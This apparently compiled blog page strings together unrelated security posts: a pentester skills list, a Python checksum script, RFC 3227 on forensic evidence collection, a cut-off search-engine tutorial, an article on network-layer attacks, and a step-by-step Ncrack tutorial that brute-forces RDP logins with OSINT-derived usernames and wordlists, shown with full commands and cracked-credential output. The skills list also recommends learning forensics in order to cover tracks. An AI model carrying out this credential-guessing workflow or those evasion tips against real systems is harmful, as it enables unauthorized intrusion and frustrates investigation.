Pages

Ideal Skill Set For the Penetration Testing

Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.

1. Mastery of an operating system. I can’t stress how important it is. So many people want to become hackers or systems security experts, without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?

2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know that structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by W. Richard Stevens (either edition works). Know the difference between TCP and UDP. Understand routing, be able to in detail describe how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?

3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP Spoof or a MiTM attack actually works. In short how can you violate or manipulate a process, if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see it work, the first thing that comes to my mind is “how does it work”.

4. Learn some basic scripting. Start with something simple like vbs or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program or in short write basic software (hello world DOES NOT count).

5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on ebay, or maybe ask your company for old ones. Start with simple ACL’s on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s not better way to understand these concepts than to apply them. Once you’re mastered this, you can move to a PIX, or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.

6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.

7. Eventually learn a programming language, then learn a few more. Don’t go and by a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!

8. Have a desire and drive to learn new stuff. This is a must; It’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for), to really get a handle on things and stay up to date.

9. Learn a little about databases, and how they work. Go download mysql, read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs help.

10. Always be willing to interact and share your knowledge with like minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery, janitorial, one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.
These things should get you started. Let me know if you have questions or comments.
Keatron.

reference:
http://resources.infosecinstitute.com/ideal-skill-set-for-the-penetration-testing/

Simple CheckSum in python

hey everyone, its too long i have dont contributed in world of computer security. okey now i will share again my simple script to check MD5 and SHA1 CheckSum in file
# This Tool for checking file signature in MD5 and SHA1
# Thanks: mywisdom, whitehat, patriot, zee, flyff666
# Visit Us in http://codewall-security
# My Blog http://devilz-kiddies.blogspot.com
# My Website http://notoshuri.com
# ich sehr liebe, sehr brauche, sehr vermisse dich honig

import sys
import hashlib

print '''
    ---------------------------------------------#
    # Simple MD5 and SHA1 CheckSum               #
    # Author Kiddies A.k.A peneter A.k.A Hadrian #
    # Copyright 2012                             #
    ----------------------------------------------
    '''

try:
    file = sys.argv[1]
    doc = open(file,'rb')
    data = doc.read()
    print 'MD5 CheckSum'
    print hashlib.md5(data).hexdigest()
    print 'SHA1 CheckSum'
    print hashlib.sha1(data).hexdigest()
except:
    print >> sys.stderr, "SCheckSum.py < file >"
 this is a screenshoot





Thanks for visit my blog and happy coding and imagine your world !

RFC 3227 - Guidelines for Evidence Collection and Archiving

Status of this Memo

   This document specifies an Internet Best Current Practices for the
   Internet Community, and requests discussion and suggestions for
   improvements.  Distribution of this memo is unlimited.

Copyright Notice

   Copyright (C) The Internet Society (2002).  All Rights Reserved.

Abstract

   A "security incident" as defined in the "Internet Security Glossary",
   RFC 2828, is a security-relevant system event in which the system's
   security policy is disobeyed or otherwise breached.  The purpose of
   this document is to provide System Administrators with guidelines on
   the collection and archiving of evidence relevant to such a security
   incident.

   If evidence collection is done correctly, it is much more useful in
   apprehending the attacker, and stands a much greater chance of being
   admissible in the event of a prosecution.

Table of Contents

   1 Introduction.................................................... 2
     1.1 Conventions Used in this Document........................... 2
   2 Guiding Principles during Evidence Collection................... 3
     2.1 Order of Volatility......................................... 4
     2.2 Things to avoid............................................. 4
     2.3 Privacy Considerations...................................... 5
     2.4 Legal Considerations........................................ 5
   3 The Collection Procedure........................................ 6
     3.1 Transparency................................................ 6
     3.2 Collection Steps............................................ 6
   4 The Archiving Procedure......................................... 7
     4.1 Chain of Custody............................................ 7
     4.2 The Archive................................................. 7
   5 Tools you'll need............................................... 7

   6 References...................................................... 8
   7 Acknowledgements................................................ 8
   8 Security Considerations......................................... 8
   9 Authors' Addresses.............................................. 9
   10 Full Copyright Statement.......................................10

1 Introduction

   A "security incident" as defined in [RFC2828] is a security-relevant
   system event in which the system's security policy is disobeyed or
   otherwise breached.  The purpose of this document is to provide
   System Administrators with guidelines on the collection and archiving
   of evidence relevant to such a security incident.  It's not our
   intention to insist that all System Administrators rigidly follow
   these guidelines every time they have a security incident.  Rather,
   we want to provide guidance on what they should do if they elect to
   collect and protect information relating to an intrusion.

   Such collection represents a considerable effort on the part of the
   System Administrator.  Great progress has been made in recent years
   to speed up the re-installation of the Operating System and to
   facilitate the reversion of a system to a 'known' state, thus making
   the 'easy option' even more attractive.  Meanwhile little has been
   done to provide easy ways of archiving evidence (the difficult
   option).  Further, increasing disk and memory capacities and the more
   widespread use of stealth and cover-your-tracks tactics by attackers
   have exacerbated the problem.

   If evidence collection is done correctly, it is much more useful in
   apprehending the attacker, and stands a much greater chance of being
   admissible in the event of a prosecution.

   You should use these guidelines as a basis for formulating your
   site's evidence collection procedures, and should incorporate your
   site's procedures into your Incident Handling documentation.  The
   guidelines in this document may not be appropriate under all
   jurisdictions.  Once you've formulated your site's evidence
   collection procedures, you should have law enforcement for your
   jurisdiction confirm that they're adequate.

1.1 Conventions Used in this Document

   The key words "REQUIRED", "MUST", "MUST NOT", "SHOULD", "SHOULD NOT",
   and "MAY" in this document are to be interpreted as described in "Key
   words for use in RFCs to Indicate Requirement Levels" [RFC2119].

2 Guiding Principles during Evidence Collection

      -  Adhere to your site's Security Policy and engage the
         appropriate Incident Handling and Law Enforcement personnel.

      -  Capture as accurate a picture of the system as possible.

      -  Keep detailed notes.  These should include dates and times.  If
         possible generate an automatic transcript.  (e.g., On Unix
         systems the 'script' program can be used, however the output
         file it generates should not be to media that is part of the
         evidence).  Notes and print-outs should be signed and dated.

      -  Note the difference between the system clock and UTC.  For each
         timestamp provided, indicate whether UTC or local time is used.

      -  Be prepared to testify (perhaps years later) outlining all
         actions you took and at what times.  Detailed notes will be
         vital.

      -  Minimise changes to the data as you are collecting it.  This is
         not limited to content changes; you should avoid updating file
         or directory access times.

      -  Remove external avenues for change.

      -  When confronted with a choice between collection and analysis
         you should do collection first and analysis later.

      -  Though it hardly needs stating, your procedures should be
         implementable.  As with any aspect of an incident response
         policy, procedures should be tested to ensure feasibility,
         particularly in a crisis.  If possible procedures should be
         automated for reasons of speed and accuracy.  Be methodical.

      -  For each device, a methodical approach should be adopted which
         follows the guidelines laid down in your collection procedure.
         Speed will often be critical so where there are a number of
         devices requiring examination it may be appropriate to spread
         the work among your team to collect the evidence in parallel.
         However on a single given system collection should be done step
         by step.

      -  Proceed from the volatile to the less volatile (see the Order
         of Volatility below).

      -  You should make a bit-level copy of the system's media.  If you
         wish to do forensics analysis you should make a bit-level copy
         of your evidence copy for that purpose, as your analysis will
         almost certainly alter file access times.  Avoid doing
         forensics on the evidence copy.

2.1 Order of Volatility

   When collecting evidence you should proceed from the volatile to the
   less volatile.  Here is an example order of volatility for a typical
   system.

      -  registers, cache

      -  routing table, arp cache, process table, kernel statistics,
         memory

      -  temporary file systems

      -  disk

      -  remote logging and monitoring data that is relevant to the
         system in question

      -  physical configuration, network topology

      -  archival media

2.2 Things to avoid

   It's all too easy to destroy evidence, however inadvertently.

      -  Don't shutdown until you've completed evidence collection.
         Much evidence may be lost and the attacker may have altered the
         startup/shutdown scripts/services to destroy evidence.

      -  Don't trust the programs on the system.  Run your evidence
         gathering programs from appropriately protected media (see
         below).

      -  Don't run programs that modify the access time of all files on
         the system (e.g., 'tar' or 'xcopy').

      -  When removing external avenues for change note that simply
         disconnecting or filtering from the network may trigger
         "deadman switches" that detect when they're off the net and
         wipe evidence.

2.3 Privacy Considerations

      -  Respect the privacy rules and guidelines of your company and
         your legal jurisdiction.  In particular, make sure no
         information collected along with the evidence you are searching
         for is available to anyone who would not normally have access
         to this information.  This includes access to log files (which
         may reveal patterns of user behaviour) as well as personal data
         files.

      -  Do not intrude on people's privacy without strong
         justification.  In particular, do not collect information from
         areas you do not normally have reason to access (such as
         personal file stores) unless you have sufficient indication
         that there is a real incident.

      -  Make sure you have the backing of your company's established
         procedures in taking the steps you do to collect evidence of an
         incident.

2.4 Legal Considerations

   Computer evidence needs to be

      -  Admissible:  It must conform to certain legal rules before it
         can be put before a court.

      -  Authentic:  It must be possible to positively tie evidentiary
         material to the incident.

      -  Complete:  It must tell the whole story and not just a
         particular perspective.

      -  Reliable:  There must be nothing about how the evidence was
         collected and subsequently handled that casts doubt about its
         authenticity and veracity.

      -  Believable:  It must be readily believable and understandable
         by a court.

3 The Collection Procedure

   Your collection procedures should be as detailed as possible.  As is
   the case with your overall Incident Handling procedures, they should
   be unambiguous, and should minimise the amount of decision-making
   needed during the collection process.

3.1 Transparency

   The methods used to collect evidence should be transparent and
   reproducible.  You should be prepared to reproduce precisely the
   methods you used, and have those methods tested by independent
   experts.

3.2 Collection Steps

      -  Where is the evidence?  List what systems were involved in the
         incident and from which evidence will be collected.

      -  Establish what is likely to be relevant and admissible.  When
         in doubt err on the side of collecting too much rather than not
         enough.

      -  For each system, obtain the relevant order of volatility.

      -  Remove external avenues for change.

      -  Following the order of volatility, collect the evidence with
         tools as discussed in Section 5.

      -  Record the extent of the system's clock drift.

      -  Question what else may be evidence as you work through the
         collection steps.

      -  Document each step.

      -  Don't forget the people involved.  Make notes of who was there
         and what were they doing, what they observed and how they
         reacted.

   Where feasible you should consider generating checksums and
   cryptographically signing the collected evidence, as this may make it
   easier to preserve a strong chain of evidence.  In doing so you must
   not alter the evidence.

4 The Archiving Procedure

   Evidence must be strictly secured.  In addition, the Chain of Custody
   needs to be clearly documented.

4.1 Chain of Custody

   You should be able to clearly describe how the evidence was found,
   how it was handled and everything that happened to it.

   The following need to be documented

      -  Where, when, and by whom was the evidence discovered and
         collected.

      -  Where, when and by whom was the evidence handled or examined.

      -  Who had custody of the evidence, during what period.  How was
         it stored.

      -  When the evidence changed custody, when and how did the
         transfer occur (include shipping numbers, etc.).

4.2 Where and how to Archive

   If possible commonly used media (rather than some obscure storage
   media) should be used for archiving.

   Access to evidence should be extremely restricted, and should be
   clearly documented.  It should be possible to detect unauthorised
   access.

5 Tools you'll need

   You should have the programs you need to do evidence collection and
   forensics on read-only media (e.g., a CD).  You should have prepared
   such a set of tools for each of the Operating Systems that you manage
   in advance of having to use it.

   Your set of tools should include the following:

      -  a program for examining processes (e.g., 'ps').

      -  programs for examining system state (e.g., 'showrev',
         'ifconfig', 'netstat', 'arp').

      -  a program for doing bit-to-bit copies (e.g., 'dd', 'SafeBack').

      -  programs for generating checksums and signatures (e.g.,
         'sha1sum', a checksum-enabled 'dd', 'SafeBack', 'pgp').

      -  programs for generating core images and for examining them
         (e.g., 'gcore', 'gdb').

      -  scripts to automate evidence collection (e.g., The Coroner's
         Toolkit [FAR1999]).

   The programs in your set of tools should be statically linked, and
   should not require the use of any libraries other than those on the
   read-only media.  Even then, since modern rootkits may be installed
   through loadable kernel modules, you should consider that your tools
   might not be giving you a full picture of the system.

   You should be prepared to testify to the authenticity and reliability
   of the tools that you use.
 
reference :http://www.faqs.org/rfcs/rfc3227.html 

Create Your Own Search Engine with Python

The ability to search a specific web site for the page you are looking for is a very useful feature. However, searching can be complicated and providing a good search experience can require knowledge of multiple programming languages. This article will demonstrate a simple search engine including a sample application you can run in your own site. This sample application is also a good introduction to the Python programming language.
This application is a combination of Python, JavaScript, CSS (Cascading Style Sheets), and HTML. You can run this application on any server which supports CGI and has Python installed. This application was tested with Python version 2.5.1. I ran this application with the Apache HTTP server. The JavaScript and style sheets for this page have been tested with Internet Explorer, Firefox, and Safari.
The code in this application is free and is released under the Apache 2.0 license. That means you are welcome to use, copy, and change this code as much as you would like. If you find any bugs, have any comments, or make any improvements I would love to hear from you. There are a couple of other programs needed to run this application. They are all free, but some of them use different licenses. You should make sure to read and understand each license before using a product.

Get the Source Code

You should start by downloading the source code for this sample. It can be found here. Once you have downloaded it you can unzip it to a work directory on your computer.

Other Programs

This program has been designed to run with the Python interpretor. You will need to have Python installed in order to use this program. If you do not already have Python you must download and install it before you run this sample.
This program can be run locally for testing, but it is meant to be run along with an HTTP server. This program will run in any HTTP server which supports CGI, but it has only been testing with the Apache HTTP server.

Run the Sample

Once you have installed Python and the Apache HTTP server you can run this program using the following steps. These steps will generate an HTML document containing search results to the system console. You can pipe this output to a file and open that file in your web browser. You may need to either add the Python executable to your path or indicate the full path to that executable depending on your system configuration.
  1. Unzip the samples archive to a directory on your machine.
  2. Open a command prompt and change directories to the location you unzipped the sample in.
  3. You can run the command python search.py > searchoutput.html to test this sample locally.
This application has been configured to run via the command line interface for easy access and testing. Configuration for a web server will be discussed later in this article.

Core Technologies

This program will use the following core technologies:
  • Python
  • JavaScript
  • Cascading Style Sheets
  • HTML
This application is meant to be a useful sample of a web site search engine. It is also a good introduction to Python, CSS, JavaScript, and HTML. This sample will demonstrate how these three technologies can work together to create a rich and configurable user interface for searching your applications.

Why Python

There are a lot of web scripting languages and tools available. PERL and Ruby come quickly to mind, but there are many more. Python is a dynamically typed object oriented language. In comparison to Java, Python allows you to reassign object types. Python does not require all code to be within an object in the way that Java does. Python can also work more like a traditional scripting language with less object use.
PERL has a specialized syntax which can be difficult to learn and Ruby most commonly relies on the RAILS framework. They are both very popular and this application could have easily been written with either of them. The benefits of PERL vs. Ruby vs. Python have been debated many times and I will not go over them here. This application could have been written in any one of those languages. Python just happens to be the language I was most interested in when I first wrote this code.

How It Works

This application works as a combination of four technologies. Some of the code in this application will run on your server and some will run in the browser. It is important to remember the context in which the code will run when creating it.
search_flow
This sample includes a sample search form named Search.html. You can customize this file as much as you want, but you must make sure that the name of the form controls remains the same. This form specifies an action URL of /cgi-bin/search.py. You may have to change this URL to reflect the location you have placed the search script on your web server. Once the user enters a search terms and presses the search button the data will be sent to the search.py script on the server. This script will take the search terms, do the actual search, and return the search results.
The search results page will be generated based on the SearchResults.html file which must be placed in the same directory as the search.py script. This HTML file contains two special values ${SEARCH_TERMS_GO_HERE} and ${SEARCH_RESULTS_GO_HERE}. These values will be replaced with the search terms and the search results respectively. Each of the search results contains a link to the page where the terms were found and some special information for the JavaScript in each page to use when highlighting the search terms. When the user clicks on one of these links they will get the HTML page containing the search terms with each term highlighted when it appears in the text.
Each page with highlighting enabled must contain a couple of small small code references. Somewhere in the header of each HTML file you must import the JavaScript and CSS files which know how to handle the search. That code looks like this:

Network Security at the Network Layer (Layer 3: IP)

Every layer of communication has its own unique security challenges. The Network Layer (Layer 3 in the OSI model) is especially vulnerable for many Denial of Service attacks and information privacy problems. The most popular protocol used in the network layer is IP (Internet Protocol). The following are the key security risks at the Network Layer associated with the IP:
IP Spoofing: The intruder sends messages to a host with an IP address (not its own IP address) indicating that the message is coming from a trusted host to gain un-authorized access to the host or other hosts. To engage in IP spoofing, a hacker must first use a variety of techniques to find an IP address of a trusted host and then modify the packet headers so that it appears that the packets are coming from that host.
Routing (RIP) attacks : Routing Information Protocol (RIP) is used to distribute routing information within networks, such as shortest-paths, and advertising routes out from the local network. RIP has no built in authentication, and the information provided in a RIP packet is often used without verifying it. An attacker could forge a RIP packet, claiming his host "X" has the fastest path out of the network. All packets sent out from that network would then be routed through X, where they could be modified or examined. An attacker could also use RIP to effectively impersonate any host, by causing all traffic sent to that host to be sent to the attacker's machine instead.
ICMP Attacks: ICMP is used by the IP layer to send one-way informational messages to a host. There is no authentication in ICMP, which leads to attacks using ICMP that can result in a denial of service, or allowing the attacker to intercept packets. Denial of service attacks primarily use either the ICMP "Time exceeded" or "Destination unreachable" messages. Both of these ICMP messages can cause a host to immediately drop a connection. An attacker can make use of this by simply forging one of these ICMP messages, and sending it to one or both of the communicating hosts. Their connection will then be broken. The ICMP "Redirect" message is commonly used by gateways when a host has mistakenly assumed the destination is not on the local network. If an attacker forges an ICMP "Redirect" message, it can cause another host to send packets for certain connections through the attacker's host.
PING Flood (ICMP Flood) : PING is one of the most common uses of ICMP which sends an ICMP "Echo Request" to a host, and waits for that host to send back an ICMP "Echo Reply" message. Attacker simply sends a huge number of "ICMP Echo Requests" to the victim to cause its system crash or slow down. This is an easy attack because many ping utilities support this operation, and the hacker doesn't need much knowledge.
Ping of Death Attack: An attacker sends an ICMP ECHO request packet that is much larger than the maximum IP packet size to victim. Since the received ICMP echo request packet is bigger than the normal IP packet size, the victim cannot reassemble the packets. The OS may be crashed or rebooted as a result.
Teardrop Attack: An attacker using the program Teardrop to send IP fragments that cannot be reassembled properly by manipulating the offset value of packet and cause reboot or halt of victim system. Many other variants such as targa, SYNdrop, Boink, Nestea Bonk, TearDrop2 and NewTear are available. A simple reboot is the preferred remedy after this happen.
Packet Sniffing: Because most network applications distribute network packets in clear text, a packet sniffer can provide its user with meaningful and often sensitive information, such as user account names and passwords. A packet sniffer can provide an attacker with information that is queried from the database, as well as the user account names and passwords used to access the database. This cause serious information privacy problems as well as tools for crimes.
Like most of the network security problems, there are no silver bullet solution to FIX the problems, however, there are many technologies and solutions available to mitigate the above security problems and to monitor the network to reduce its damage if attack happens. The problems such as PING flood can be effectively reduced by deploying Firewalls at critical locations of a network to filter un-wanted traffic and from iffy destinations. By utilizing IPsec VPN at the network layer and by using session and user (or host) authentication and data encryption technologies at the data link layer, the risk of IP Spoofing and Packet Sniffing will be reduced significantly. IPv 6 in combination with IPsec provides better security mechanisms for the communication at the network level and above.

DarunGrim: A Patch Analysis and Binary Diffing Tool

DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities it's fixing. You can use that information to learn what causes software break. Also that information can help you write some protection codes for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers. This binary diffing technique is especially useful for Microsoft binaries. Not like other vendors they are releasing patch regularly and the patched vulnerabilities are relatively concentrated in small areas in the code. That makes the patched part more visible and apparent to the patch analyzers. There is a "eEye Binary Diffing Suites" released back in 2006 and it's widely used by security researchers to identify vulnerabilities. Even though it's free and opensource, it's powerful enough to be used for that vulnerabilities hunting purpose. DarunGrim2 is a C++ port of original python codes. DarunGrim2 is way faster than original DarunGrim. And DarunGrim3 is an advanced version of DarunGrim2 which provides nice file management UI. Binaries : http://github.com/ohjeongwook/DarunGrim/downloads
Source : http://github.com/ohjeongwook/DarunGrim Reference : http://www.darungrim.org/, http://exploitshop.wordpress.com

Ncrack – Remote Desktop Brute Force Tutorial

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:
jessie tagle julio feagins hugh duchene darmella martis lakisha mcquain ted restrepo kelly missildine
Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.
jtagle jfeagins hduchene dmartis lmcquain trestrepo kmissildine
Software required: Linux machine, preferably Ubuntu. nmap and terminal server client, sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev About Ncrack Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/ Installation
wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz mkdir /usr/local/share/ncrack tar -xzf ncrack-0.4ALPHA.tar.gz cd ncrack-0.4ALPHA ./configure make checkinstall dpkg -i ncrack_0.4ALPHA-1_i386.deb [/pre] Information gathering Let’s find out what hosts in a network are up, and save them to a text list. The regular expression will parse and extract only the ip addresses from the scan. Nmap ping scan, go no further than determining if host is online
nmap -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt
Nmap fast scan with input from list of hosts/networks
nmap -F -iL 192.168.56.0.txt Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST Nmap scan report for 192.168.56.10 Host is up (0.0017s latency). Not shown: 91 closed ports PORT STATE SERVICE 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1028/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems) Nmap scan report for 192.168.56.101 Host is up (0.014s latency). Not shown: 96 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-term-serv MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems) Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds
From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying to pwn it. At this point we need to create a file (my.usr) with the probable usernames previously gathered.
vim my.usr jtagle jfeagins hduchene trestrepo kmissildine
We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.
vim my.pwd somepassword passw0rd blahblah 12345678 iloveyou trustno1
At this point we run Ncrack against the 192.168.56.10 machine.
ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1 Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou' rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon. Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1' rdp://192.168.56.10:3389 finished. Discovered credentials for rdp on 192.168.56.10 3389/tcp: 192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd' 192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah' 192.168.56.10 3389/tcp rdp: 'jtagle' '12345678' 192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou' 192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1' Ncrack done: 1 service scanned in 98.00 seconds. Probes sent: 51 | timed-out: 0 | prematurely-closed: 0 Ncrack finished.
We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out. Run the terminal server client from the Linux box tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!! Final remarks. For the penetration testers: don’t give up at first hurdle, there’s always another way to break in :-) . For the IT staff: Lack of password policy enforcing complexity and strength lead to a disaster. reference:Here